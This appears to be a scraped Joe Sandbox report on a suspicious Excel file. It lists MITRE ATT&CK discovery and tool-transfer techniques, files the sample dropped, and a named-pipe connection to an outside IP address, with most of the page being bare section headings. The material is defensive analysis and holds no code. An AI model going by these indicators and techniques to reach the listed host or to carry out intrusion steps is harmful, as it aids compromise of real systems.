Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report re-march-26-2024-9856.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

Exploits

Compliance

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\242C445E.gif

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\24F09391.gif

C:\Users\user\AppData\Local\Temp\CCE0.tmp

C:\Users\user\AppData\Local\Temp\~DF1FD7694CB6FBF19E.TMP

C:\Users\user\Desktop\~$re-march-26-2024-9856.xlsx

\Device\Mup\170.130.55.130\PIPE\srvsvc

Static File Info

General

File Icon

Static OLE Info

General

OLE File "re-march-26-2024-9856.xlsx"

Indicators

Network Behavior

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: EXCEL.EXEPID: 2348, Parent PID: 564

General

Chronological Activities

Analysis Process: explorer.exePID: 312, Parent PID: 1688

General

Windows Analysis Report
re-march-26-2024-9856.xlsx